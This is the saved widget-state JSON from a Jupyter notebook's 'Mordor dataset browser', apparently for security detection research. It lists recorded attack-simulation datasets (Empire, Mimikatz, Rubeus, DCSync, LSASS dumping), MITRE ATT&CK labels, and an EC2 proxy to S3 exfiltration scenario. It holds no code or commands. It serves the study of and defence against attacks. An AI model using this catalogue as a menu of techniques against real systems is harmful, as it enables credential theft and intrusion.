"IPY_MODEL_70fd3df0081040cb8e665f596911aca0" } }, "79a4915d0be448a597e5817000937c48": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "7aedafe1ed574aecaabec6d4f61416da": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HTMLModel", "state": { "layout": "IPY_MODEL_a78cda946ab54ee6bfe2247d3efa94a2", "style": "IPY_MODEL_79a4915d0be448a597e5817000937c48", "value": " 57/57 [05:14<00:00, 5.52s/ files]" } }, "7d5ebde1c581446798e90021ccc34191": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "7df2c107b2bb486c8e6d84d634323c3f": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "80595b0b60f5412ebc93246191b6e337": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HTMLModel", "state": { "description": "attacks", "layout": "IPY_MODEL_1999c1cdc50c4520a537eb81bb8b03ca", "style": "IPY_MODEL_3e66b46fc13346358e05316f28219477", "value": "

Mitre Technique T1078 (sub: 004) : Valid Accounts

Mitre Tactics: TA0001: Initial Access, TA0003: Persistence, TA0004: Privilege Escalation, TA0005: Defense Evasion

Mitre Technique T1530 : Data from Cloud Storage Object

Mitre Tactics: TA0009: Collection" } }, "80a6a1491f3d4eadb10acc6ae946a6ce": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "81fe0e98cb814ae6aa47d54c0349b63e": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "SelectMultipleModel", "state": { "_options_labels": [ "T1078 - Valid Accounts", "T1530 - Data from Cloud Storage Object", "T1222 - File and Directory Permissions Modification", "T1003 - OS Credential Dumping", "T1069 - Permission Groups Discovery", "T1087 - Account Discovery", "T1547 - Boot or Logon Autostart Execution", "T1053 - Scheduled Task/Job", "T1550 - Use Alternate Authentication Material", "T1574 - Hijack Execution Flow", "T1059 - Command and Scripting Interpreter", "T1546 - Event Triggered Execution", "T1055 - Process Injection", "T1112 - Modify Registry", "T1021 - Remote Services", "T1047 - Windows Management Instrumentation", "T1049 - System Network Connections Discovery", "T1218 - Signed Binary Proxy Execution", "T1123 - Audio Capture", "T1548 - Abuse Elevation Control Mechanism", "T1210 - Exploitation of Remote Services" ], "description": "Mitre Techniques", "index": [ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20 ], "layout": "IPY_MODEL_a07f73122b1043e3a2b53facf9dc2364", "rows": 5, "style": "IPY_MODEL_1b4fec3a153d43ddac2693ee62dc62db" } }, "853e8ac9109545b6b0b0212e0a024e2e": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextModel", "state": { "description": "tags", "layout": "IPY_MODEL_1999c1cdc50c4520a537eb81bb8b03ca", "style": "IPY_MODEL_86ff8d4bf78941dcb0f3bc81a795696b", "value": "EC2 Proxy Abuse, S3 Data Exfiltration" } }, "86ca490e74884605857e3b2aa1485f22": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ProgressStyleModel", "state": { "description_width": "initial" } }, "86ff8d4bf78941dcb0f3bc81a795696b": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "87031dc2d0f341568fb968c5f6ee1753": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "8a0f7621bdbb4f51836a03b2c31badd3": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "8b1088fa20be4f0fafa3e8d3c549e60d": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_196e627805a4464a983a990be8452b03", "IPY_MODEL_ed395411b7c14d41849e0c4e04638496" ], "layout": "IPY_MODEL_227af9ea3c644405abd5b2f83ca20e06" } }, "8cc83098baec4f78b1a4d91266c32802": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "8e9b4dc9aa6c4efbb5e285c82e7ea125": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_0164b6d653774f3d811cea200de21cb2", "IPY_MODEL_5f103a0dddbb430ba59b66d8131eb157" ], "layout": "IPY_MODEL_e9ad571d1298469580b5b0548c02ed28" } }, "902158c54f544d619e277af05ea0abda": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "973b3cc26eb144178fbc3f5cd879acb5": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextModel", "state": { "description": "title", "layout": "IPY_MODEL_1999c1cdc50c4520a537eb81bb8b03ca", "style": "IPY_MODEL_e348a7713a6f4afe9467f88f57910395", "value": "AWS Cloud Bank Breach S3" } }, "98e7a335eb6942728df8ad89b9091b3d": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "SelectMultipleModel", "state": { "_options_labels": [ "TA0001 - Initial Access", "TA0003 - Persistence", "TA0004 - Privilege Escalation", "TA0005 - Defense Evasion", "TA0009 - Collection", "TA0006 - Credential Access", "TA0007 - Discovery", "TA0008 - Lateral Movement", "TA0002 - Execution" ], "description": "Mitre Tactics", "index": [ 0, 1, 2, 3, 4, 5, 6, 7, 8 ], "layout": "IPY_MODEL_1c1c043edd1b412fbc11a3c03575b586", "rows": 5, "style": "IPY_MODEL_e7052839959d4cdaa49340cfe9f7f80b" } }, "a07f73122b1043e3a2b53facf9dc2364": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "height": "100px", "width": "40%" } }, "a18c579165ce4b2f9d3fa4d3e07fa8ef": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextModel", "state": { "description": "title", "layout": "IPY_MODEL_647f49b51caa47a7acc4adf675dfd47b", "style": "IPY_MODEL_3da201ec0e6c4a4488cc7d6e9f5e1054", "value": "AWS Cloud Bank Breach S3" } }, "a2e96eefc5114fdca95a990b015031ce": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "a456ee0e6c8b44e68cd54302226dfa73": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "a45d771601644fea9c9f0391f705d28b": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "a48730166dd74cbf9e97e57a141da050": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "a70689f896f74f2daf29e27a2b041f1a": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "a70b0021bce34751b70575aa7498a372": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextareaModel", "state": { "description": "references", "layout": "IPY_MODEL_1999c1cdc50c4520a537eb81bb8b03ca", "style": "IPY_MODEL_07c0118cae4f47a99b130e95d32b2186", "value": "['https://github.com/RhinoSecurityLabs/cloudgoat/tree/master/scenarios/cloud_breach_s3']" } }, "a78cda946ab54ee6bfe2247d3efa94a2": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "a888e5cace3c469fb95f8170c6d23e59": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextareaModel", "state": { "description": "description", "layout": "IPY_MODEL_647f49b51caa47a7acc4adf675dfd47b", "style": "IPY_MODEL_3dd3958361f447be84ab38ea5701f571", "value": "This dataset represents adversaries abusing a misconfigured EC2 reverse proxy to obtain instance profile keys and eventually exfiltrate files from an S3 bucket." } }, "aba795964a1040b79314d6a4bda98486": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "abe73812644a4742bc8292f7a9e1937b": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "LabelModel", "state": { "layout": "IPY_MODEL_31169bba041a4b20919221e4ce7ce8dd", "style": "IPY_MODEL_3c83670a67f64f14a315906e595035c2", "value": " comma ORs values, '+' ANDs values" } }, "ac32c7cca9c24c7988f0eb4e9197d5b4": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "ac3a23e4fa0c47c7b7d1c7fe7ea82e49": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "ac45c5eb72044ea7b5ea9972a9689fa4": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "SelectModel", "state": { "_options_labels": [ "(cloud) ec2_proxy_s3_exfiltration.zip" ], "description": "file_paths", "index": 0, "layout": "IPY_MODEL_1999c1cdc50c4520a537eb81bb8b03ca", "style": "IPY_MODEL_c2495c0c6ebf47aba3349f87d1ba0f77" } }, "ad9dfbe7ba9543358b103f86dc8f59d6": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "ade40f5f5b2f4a4faed7fd0cfb9938ab": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "SelectModel", "state": { "_options_labels": [ "SDAWS-200914011940 AWS Cloud Bank Breach S3 (AWS)", "SDWIN-190301125905 Empire Powerview Add-DomainObjectAcl (Windows)", "SDWIN-190301174830 Empire DCSync (Windows)", "SDWIN-190319020147 Empire Net Local Administrators Group (Windows)", "SDWIN-190319020729 Empire Net Local Users (Windows)", "SDWIN-190319021158 Empire Net Domain Users (Windows)", "SDWIN-190319023812 Empire Userland Registry Run Keys (Windows)", "SDWIN-190319024742 Empire Userland Scheduled Tasks (Windows)", "SDWIN-190319131123 Empire Over-Pass-The-Hash (Windows)", "SDWIN-190319145126 Rubeus Userland ASKTGT PTT (Windows)", "SDWIN-190403133337 IKEEXT Remote Service DLL Hijack (Windows)", "SDWIN-190518182022 Empire VBS Execution (Windows)", "SDWIN-190518184306 Empire Elevated WMI Eventing (Windows)", "SDWIN-190518200432 Empire PSInject (Windows)", "SDWIN-190518201207 Empire Shell Net Domain Admins (Windows)", "SDWIN-190518201922 Empire WDigest Downgrade (Windows)", "SDWIN-190518202151 Empire Mimikatz LogonPasswords (Windows)", "SDWIN-190518203650 Empire Enable RDP (Windows)", "SDWIN-190518210125 Empire Invoke SMBExec (Windows)", "SDWIN-190518210652 Empire Invoke PsExec (Windows)", "SDWIN-190518211052 Empire Invoke DCOM ShellWindows (Windows)", "SDWIN-190518211456 Empire Invoke PSRemoting (Windows)", "SDWIN-190518213907 Empire Invoke Execute MSBuild (Windows)", "SDWIN-190518221344 Empire Invoke DLLInjection (Windows)", "SDWIN-190518224039 Empire Find Local Admin Access (Windows)", "SDWIN-190518230752 Empire Mimikatz Extract Kerberos Keys (Windows)", "SDWIN-190518235535 Empire Mimikatz Backup Keys (Windows)", "SDWIN-190519005224 Empire Remote Get Session (Windows)", "SDWIN-190625103712 Empire Mimikatz SAM Extract Hashes (Windows)", "SDWIN-190625133822 Empire Reg Dump SAM Hive (Windows)", "SDWIN-191027055035 RDP TaskManager LSASS Dump (Windows)", "SDWIN-191027223020 Covenant ShellCmd InstallUtil (Windows)", "SDWIN-191225045202 Empire Invoke InternalMonologue (Windows)", "SDWIN-200609225055 MSF Record Mic (Windows)", "SDWIN-200721232741 Empire Regsvr32 Execution (Windows)", "SDWIN-200722001847 Empire Elevated Registry Run Keys (Windows)", "SDWIN-200724174200 Covenant Remote WMI Eventing ActiveScriptEventConsumers (Windows)", "SDWIN-200805020926 Covenant DCSync (Windows)", "SDWIN-200805034820 Covenant SC.exe Utility Query (Windows)", "SDWIN-200806012009 Covenant SharpSC Query (Windows)", "SDWIN-200806015757 Covenant Remote File Copy (Windows)", "SDWIN-200806022635 Covenant SharpSC Create (Windows)", "SDWIN-200806030120 Covenant SharpSC Start (Windows)", "SDWIN-200806031938 Covenant SharpSC Stop Service (Windows)", "SDWIN-200806035621 Covenant SharpWMI Exec (Windows)", "SDWIN-200806115603 Covenant PowerShell Remoting Command (Windows)", "SDWIN-200806130039 Covenant GetDomainGroup Domain Admins (Windows)", "SDWIN-200807103913 Empire Mimikatz Lsadump LSA Patch (Windows)", "SDWIN-200904032946 Invoke BypassUAC FodHelper (Windows)", "SDWIN-200914080546 Empire Remote WMIC Add User (Windows)", "SDWIN-200916232559 Mimikatz Netlogon Unauthenticated NetrServerAuthenticate2 (Windows)", "SDWIN-200917174542 DCOM ExecuteExcel4macro (Windows)", "SDWIN-200918145959 DCOM RegisterXLL (Windows)", "SDWIN-200921001437 Empire Invoke WMI (Windows)", "SDWIN-200921175806 Empire Elevated Scheduled Tasks (Windows)", "SDWIN-200921230246 Rubeus Elevated ASKTGT CreateNetOnly (Windows)", "SDWIN-200922042230 Empire Powerdump Extract Hashes (Windows)" ], "description": "Data sets", "index": 0, "layout": "IPY_MODEL_1999c1cdc50c4520a537eb81bb8b03ca", "style": "IPY_MODEL_a48730166dd74cbf9e97e57a141da050" } }, "ae2e25c6ec6c446ca45bea907ee17d19": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "b0667e190da9446e8094794dd857281f": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "b50690d721034aa895369da66b5198c7": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextModel", "state": { "description": "platform", "layout": "IPY_MODEL_647f49b51caa47a7acc4adf675dfd47b", "style": "IPY_MODEL_15cc7e4d39db4d30ad623825612f9cff", "value": "AWS" } }, "b755f2ec4afc4878b39f40c6b99e2a63": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "b7af59b013a34a0cbb9d1fdc408fbbfc": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "ba1fe8518d564de3b6bc0ab913ed1eaa": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "bc4d326e33d14443a023cc32382e450d": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "bc63213943704f288317b5d00cc19b0a": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextModel", "state": { "description": "author", "layout": "IPY_MODEL_1999c1cdc50c4520a537eb81bb8b03ca", "style": "IPY_MODEL_da7b4253e0a64992bd61bdc32b6abb51", "value": "Roberto Rodriguez @Cyb3rWard0g" } }, "be7cc59a47014704ac98626c7fd932a7": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "bf1a6fa8f4504720860c17624decbf02": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "c1901c134f6f467dba2fad20ada839ea": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "height": "200px", "width": "70%" } }, "c2495c0c6ebf47aba3349f87d1ba0f77": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "c2e8f27be0424336930c22fb63a4f884": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HTMLModel", "state": { "layout": "IPY_MODEL_0329d23fb8c84bb3944067c8c0952111", "style": "IPY_MODEL_c69dfee0411744aeafe38d99b58f89d4", "value": "

Mordor dataset browser

" } }, "c5b9df9c55be4d75a6c3d956607abcec": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "initial" } }, "c64e723f0df44dab86d4ffde1141aeda": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Reset filter", "layout": "IPY_MODEL_902158c54f544d619e277af05ea0abda", "style": "IPY_MODEL_b755f2ec4afc4878b39f40c6b99e2a63" } }, "c69dfee0411744aeafe38d99b58f89d4": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "c7ce0402538d4bb683f037f4a1f22db8": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "c9e23342af3e4f8881ff245933286e44": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextModel", "state": { "description": "Filter", "layout": "IPY_MODEL_1999c1cdc50c4520a537eb81bb8b03ca", "style": "IPY_MODEL_ae2e25c6ec6c446ca45bea907ee17d19" } }, "cbb5cc87c81a4f90b3fefa8baba81286": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextareaModel", "state": { "description": "description", "layout": "IPY_MODEL_1999c1cdc50c4520a537eb81bb8b03ca", "style": "IPY_MODEL_d505bbea15f84dbca2447ee0cda50e8b", "value": "This dataset represents adversaries abusing a misconfigured EC2 reverse proxy to obtain instance profile keys and eventually exfiltrate files from an S3 bucket." } }, "cf785e6f037b4e56825395070ea6e151": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "initial" } }, "d505bbea15f84dbca2447ee0cda50e8b": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "d5ebea2ba6cb4c999c2ca71bdd18a303": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "d6c8a584ee224c529b722d26b22f9957": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "AccordionModel", "state": { "_titles": { "0": "Filters" }, "children": [ "IPY_MODEL_fa8aea703bdb439780a167ee890e10c8" ], "layout": "IPY_MODEL_e71a934845e6448191f9819a9de9da08", "selected_index": null } }, "d6d592e91a0849c5889a0f09e3d42baa": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextModel", "state": { "description": "Filter", "layout": "IPY_MODEL_647f49b51caa47a7acc4adf675dfd47b", "style": "IPY_MODEL_0085351ab1274adb84fff8e15f00ef7e" } }, "d92b8067e8ea411b8721746c40e84c5d": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_1488d6fdd10e48d28c73b4873e114b14", "IPY_MODEL_ade40f5f5b2f4a4faed7fd0cfb9938ab", "IPY_MODEL_d6c8a584ee224c529b722d26b22f9957" ], "layout": "IPY_MODEL_6573400329f84022af769bb793389703" } }, "d92c9364fe28418a8694f6f2d0675393": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "da7b4253e0a64992bd61bdc32b6abb51": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "db8ad5529fd8420492756b174c584de8": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextModel", "state": { "description": "author", "layout": "IPY_MODEL_647f49b51caa47a7acc4adf675dfd47b", "style": "IPY_MODEL_0513f34232dc4d66bdec18a819a65bc7", "value": "Roberto Rodriguez @Cyb3rWard0g" } }, "de91f0de57e54aa4a6179c752e52d3ac": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "e2bfded2a0ad4628a8106cad6144fabc": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextModel", "state": { "description": "platform", "layout": "IPY_MODEL_1999c1cdc50c4520a537eb81bb8b03ca", "style": "IPY_MODEL_a456ee0e6c8b44e68cd54302226dfa73", "value": "AWS" } }, "e348a7713a6f4afe9467f88f57910395": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "e463e5729fc748d0bab3cf5891f1d76b": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextareaModel", "state": { "description": "query name", "layout": "IPY_MODEL_1999c1cdc50c4520a537eb81bb8b03ca", "style": "IPY_MODEL_ac3a23e4fa0c47c7b7d1c7fe7ea82e49", "value": "small.aws.collection.ec2_proxy_s3_exfiltration (AWS Cloud Bank Breach S3, SDAWS-200914011940)" } }, "e7052839959d4cdaa49340cfe9f7f80b": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "e71a934845e6448191f9819a9de9da08": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "e8e31268a7df4c6088f138fc0a387cfa": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "e9ad571d1298469580b5b0548c02ed28": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "ec27df812f6a47f08821c4bf1040459a": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "ece2bc63290248a0badfad760907811c": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "ed395411b7c14d41849e0c4e04638496": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_a18c579165ce4b2f9d3fa4d3e07fa8ef", "IPY_MODEL_0bd9762ed7f3469d942d65cdeaf93892", "IPY_MODEL_db8ad5529fd8420492756b174c584de8", "IPY_MODEL_12e3d4e2e2674a5d83a848bbf1795250", "IPY_MODEL_3b4c62c7679b47a6b0502a43cb3d53b2", "IPY_MODEL_b50690d721034aa895369da66b5198c7", "IPY_MODEL_a888e5cace3c469fb95f8170c6d23e59", "IPY_MODEL_385886c636fc4a3ebba6d7433bacf137", "IPY_MODEL_4cba7100a77d4a67a9e30740a047c57d", "IPY_MODEL_7044344294cb4ecdbe044c53779be27a", "IPY_MODEL_558ea780be9242a99605ddc0b175b3f7", "IPY_MODEL_0561b3a93c5443f6a4f359f17851beab", "IPY_MODEL_249556214a2d41a9b689a173dd3cc2ce", "IPY_MODEL_27460ceabac04572b3bdae58fd275bc2" ], "layout": "IPY_MODEL_45165fcbf8164ce2b7ce062c507c806d" } }, "ed6812b281a444e8b320b86b520a993e": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "initial" } }, "f169ab2db4c64030b2179596d3ee6213": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Reset filter", "layout": "IPY_MODEL_b0667e190da9446e8094794dd857281f", "style": "IPY_MODEL_8a0f7621bdbb4f51836a03b2c31badd3" } }, "f37054c182ce4fa699afffa54a49cd35": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "SelectMultipleModel", "state": { "_options_labels": [ "TA0001 - Initial Access", "TA0003 - Persistence", "TA0004 - Privilege Escalation", "TA0005 - Defense Evasion", "TA0009 - Collection", "TA0006 - Credential Access", "TA0007 - Discovery", "TA0008 - Lateral Movement", "TA0002 - Execution" ], "description": "Mitre Tactics", "index": [ 0, 1, 2, 3, 4, 5, 6, 7, 8 ], "layout": "IPY_MODEL_a07f73122b1043e3a2b53facf9dc2364", "rows": 5, "style": "IPY_MODEL_ec27df812f6a47f08821c4bf1040459a" } }, "f564cc6a7335491eb7f12015ae752752": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "f5e596a77c8b47998b9dfd0439a51c58": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "initial" } }, "fa57c2981a014c6aa434fd6e9b32f20e": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "fa6daef63a734178baa4e1c093f31cbf": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "SelectModel", "state": { "_options_labels": [ "(cloud) ec2_proxy_s3_exfiltration.zip" ], "description": "file_paths", "index": 0, "layout": "IPY_MODEL_647f49b51caa47a7acc4adf675dfd47b", "style": "IPY_MODEL_7d5ebde1c581446798e90021ccc34191" } }, "fa8aea703bdb439780a167ee890e10c8": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_2ff8099083884490912790f4f4ee3424", "IPY_MODEL_734b47ff6f5b4746a590006e099e471e" ], "layout": "IPY_MODEL_d92c9364fe28418a8694f6f2d0675393" } }, "fbd378c0ef2e4dc9be8330bb8120f724": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "febb623c645d4f7d9b2469e493104f50": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_d92b8067e8ea411b8721746c40e84c5d", "IPY_MODEL_516c7ff671144ad495b4cf4a7aa53602" ], "layout": "IPY_MODEL_32d8d9aebbb3483290926dff1dfea13e" } } }, "version_major": 2, "version_minor": 0 } } }, "nbformat": 4, "nbformat_minor": 4 }